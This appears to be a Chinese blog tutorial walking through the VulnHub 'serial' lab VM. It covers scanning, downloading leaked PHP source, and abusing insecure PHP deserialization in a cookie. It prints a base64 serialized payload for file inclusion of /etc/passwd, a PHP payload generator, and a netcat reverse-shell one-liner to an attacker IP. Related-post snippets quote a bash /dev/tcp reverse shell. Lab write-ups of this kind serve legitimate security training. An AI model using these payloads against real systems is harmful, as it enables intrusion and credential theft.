反序列化靶机实战serial(保姆级教程)

已于 2024-08-01 20:33:13 修改
阅读量1.2k 收藏 7
点赞数 41
文章标签: 服务器 linux 网络 serial靶机实战
于 2024-08-01 20:08:14 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2201_75891821/article/details/140853004
版权

一.信息收集

靶机地址下载:https://download.vulnhub.com/serial/serial.zip

打开靶机,在kali虚拟机中进行主机存活探测

可以知道靶机ip地址为192.168.133.171

然后扫描端口 可以发现有一个22端口跟80端口

然后接下来用kali扫描它的目录 

可以发现有一个可访问的目录 我们去访问一下

访问之后backup目录下有一个bak.zip 下载下来

下载下来之后有三个文件  分析一下

index.php

<?php
    include("user.class.php");

    if(!isset($_COOKIE['user'])) {
        setcookie("user", base64_encode(serialize(new User('sk4'))));
    } else {
        unserialize(base64_decode($_COOKIE['user']));
    }
    echo "This is a beta test for new cookie handler\n";
?>

log.class.php

<?php
  class Log {
    private $type_log;

    function __costruct($hnd) {
      $this->$type_log = $hnd;
    }

    public function handler($val) {
      include($this->type_log);
      echo "LOG: " . $val;
    }
  }
?>

user.class.php

<?php
  include("log.class.php");

  class Welcome {
    public function handler($val) {
      echo "Hello " . $val;
    }
  }

  class User {
    private $name;
    private $wel;

    function __construct($name) {
      $this->name = $name;
      $this->wel = new Welcome();
    }

    function __destruct() {
      //echo "bye\n";
      $this->wel->handler($this->name);
    }
  }

?>

 提示cookie,burpsuite抓包看一下cookie

cookie那里有一串base64加密的 解密一下

base64解码得到序列化后字段是

O:4:"User":2:{s:10:"Username";s:3:"sk4";s:9:"Userwel";O:7:"Welcome":0:{}}

 然后我们构造payload 读取/etc/passwd文件

O:4:"User":2:{s:10:"\x00User\x00name";s:5:"admin";s:9:"\x00User\x00wel";O:3:"Log":1:{s:8:"type_log";s:11:"/etc/passwd";}}')

base64编码

Tzo0OiJVc2VyIjoyOntzOjEwOiIAVXNlcgBuYW1lIjtzOjM6InNrNCI7czo5OiIAVXNlcgB3ZWwiO086MzoiTG9nIjoxOntzOjg6InR5cGVfbG9nIjtzOjExOiIvZXRjL3Bhc3N3ZCI7fX0=

 然后再次抓包 打开用burp的repeater

将加密后的替换一下 就可以看到  然后成功包含  看到有一个sk4用户可登陆

get shell

构造序列化语句上传shell

生成一个shell放在本地网站下

然后构造payload,尝试读取passwd文件,payload如下 新创建一个1.php在本地的www下 然后 把type_log参数后面记得改成自己上传到本地的一句话木马

<?php
  class Log {
    private $type_log = "/etc/passwd";
  }

  class User {
    private $name = "admin";
    private $wel;

    function __construct() {
      $this->wel = new Log();
  }
}
$obj = new User();
echo base64_encode(serialize($obj));

然后去访问自己新创建的php 我这里用的是7.php 打开就看到他的base64编码

然后去抓包 把访问7.php得到的base64编码 替换cookie

成功执行

开始反弹shell

rm+/tmp/f;mkfifo+/tmp/f;cat+/tmp/f|/bin/sh+-i+2>&1|nc+1192.168.133.163+6666+>/tmp/f

将上述代码url编码后填入参数位置

然后在kali里开启监听监听成功 

在攻击模块发送 成功获取shell

查看文件,多返回几次上级目录,找到一个txt文件

查看文件得到他的账号跟密码

最后在远程连接 成功进入

苏北辰-
关注
  • 41
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
VulnHub 靶机系列实战教程.pdf
07-22
VulnHub 靶机系列实战教程.pdf
php反序列化靶机serial实战
zzgslh的博客
04-07 1243
靶机描述 今天研究一下php反序列化靶机serial实战。目标为获取root权限。 靶机信息 可以去vulhub上下载此靶机: https://www.vulnhub.com/entry/serial-1,349/ 下载好,之后,使用Vmware新建虚拟机打开,步骤如下: 1.首先创建新的虚拟机。 2.然后选择客户机版本为Ubuntu 64位。 3.然后选择使用现有磁盘,选择下载的...
vulhub-serial-php反序列化靶机实战
飞鱼的企鹅的博客
01-04 1933
前言 此漏洞环境是vulhub上的系列漏洞之一,是php反序列化漏洞,也用到了远程代码执行漏洞。 复现过程 环境搭建 靶机下载地址 https://www.vulnhub.com/entry/serial-1,349/ 下载好之后直接用Vmware workstation打开就行了 存活扫描 内网存活主机扫描 arp-scan -l 扫描到的存活主机是192.168.77.157 端口扫描 ...
反序列化靶机serial复现
muyuchen110的博客
08-01 735
【代码】反序列化靶机serial复现。
VulnHub-DarkHole_2靶机实战(超详细保姆教程)
精品博客,你值得一看~
08-13 4298
记得我们查看过9999端口运行的程序,当我们看到源代码的内容时,我们看到这允许远程命令执行。bash -c ‘bash -i >& /dev/tcp/192.168.184.156/9001 0>&1’ #记得修改你的IP。id=1' and 1=2 --+ #页面信息消失,说明id的闭合为单引号。到此,我们就可以进行ssh连接了.下面是拓展工具注入的方式.着急看结果的宝宝们可以直接移步下面的ssh连接步骤.
CISP-PTE-Centos 靶机安装(保姆教程
honest_gg的博客
07-21 2537
CISP-PTE-Centos:考试(靶机)环境安装
php反序列化construct绕过,PHP反序列化漏洞(1)
weixin_39730801的博客
03-11 1743
PHP反序列化漏洞(1)背景Serialize() //将一个对象转换成一个字符串unserialize() //将字符串还原成一个对象通过序列化与反序列化我们可以很方便的在PHP中进行对象的传递。本质上反序列化是没有危害的。但是如果用户对数据可控那就可以利用反序列化构造payload攻击。常见方法__construct()//创建对象时触发__destruct() //对象被销毁时触...
Fastjson反序列化
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
07-05 1599
fastjson
pikachu之php反序列化()
weixin_54431413的博客
04-15 3255
pikachu靶场的反序列化漏洞 (代码审计能力有点弱鸡,不对之处请指教)
pikachu PHP反序列化(皮卡丘漏洞平台通关系列)
箭雨镜屋
01-30 3886
诶嘿,又是一个简单的关卡 1、学习,学习一下 先跟着pikachu简单学习一下什么叫序列化和反序列化: 但其实我已知这里有两个地方写的不对,需要更正一下: (1)序列化结果中的S不是对象名称,而是类名称;同样的,O和S中间的1应该是类名字长度。 (2)几个魔法函数的举例有点让人误会,很容易误以为这些魔法函数都会造成反序列化漏洞,但其实__construct()在unserialize()时并不会被自动调用,这点在之后会进行演示。 总之,序列化是把对象转换为字符串,从而达到传输和存储的目的
Apache Log4j反序列化命令执行漏洞
01-10
vulhub靶机里的这个漏洞里缺少了curl或者wget这些命令
靶机操作练习,earth 靶机实战练习
09-08
网络安全和渗透测试的学习过程中,靶机操作是一个重要的实践环节。在这个案例中,我们通过一个名为"earth"的靶机进行了一系列的操作,旨在提升信息收集、Web应用分析、权限提升和漏洞利用等技能。 首先,我们进行...
USB驱动程序知识介绍
最新发布
HJQD777的博客
09-07 444
USB驱动程序是操作系统与USB设备之间通信的核心组件,负责设备识别、数据传输、电源管理等关键任务。它使得操作系统能够与广泛的USB设备(如键盘、鼠标、存储设备等)高效、可靠地进行交互。
CPU服务器如何应对大规模并行计算需求?
JttiSEO的博客
09-04 403
通过合理的负载均衡、任务调度与优化策略,企业和科研机构能够充分挖掘计算资源的潜力,满足不断增长的计算需求。在并行计算中,缓存的性能直接影响计算效率。实时监控 CPU 服务器的性能指标,如 CPU 利用率、内存占用、I/O 等,依据监测结果进行调优,确保系统在最佳状态下运行。通过虚拟化技术,CPU 服务器能够在同一物理服务器上运行多个虚拟机,实现资源共享和有效隔离,从而优化整体计算资源的使用率。针对动态变化的计算需求,可以实现动态负载均衡机制,根据当前计算节点的负载情况,实时调整任务分配,优化资源利用。
springboot服务器文件读取工具类
dashalen的博客
09-06 547
springboot服务器本地文件读取和网络文件读取
新加坡裸机云多IP服务器特性
IDC_USA的博客
09-03 467
随着云计算技术的发展,越来越多的企业开始寻求更加灵活、高性能且安全可靠的计算资源来支撑其业务发展。裸机云(Bare Metal Cloud)作为一种新兴的服务模式,融合了传统物理服务器的高性能与云计算的灵活性,受到了广泛关注。新加坡作为亚洲重要的数据中心枢纽之一,其裸机云多IP服务器更是备受青睐。本文将重点介绍新加坡裸机云多IP服务器的主要特性及其优势。
uniapp+vue+ts开发中使用signalR实现客户端和服务器通讯
qq_51384850的博客
09-03 257
WebSocket本质上是一个基于TCP的持久化协议,相对于HTTP这种非持久的协议来说,它能够更好的节省服务器资源和带宽,并且真正实现实时通信。最大的缺点就是对旧版本浏览器不支持。至此SignalR的出现,完美的解决了种浏览器的问题,SignalR不仅可以实现WebSocket的所有功能,还对旧版本浏览器做了支持。提供多个受支持的平台,其中每个平台都有各自的客户端 SDK。监听返回的数据目标是不是针对当前客户端,是的话将返回的数据做处理。对返回的数据类型做判断,展示对应的电视机界面,并在界面中可以通过。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值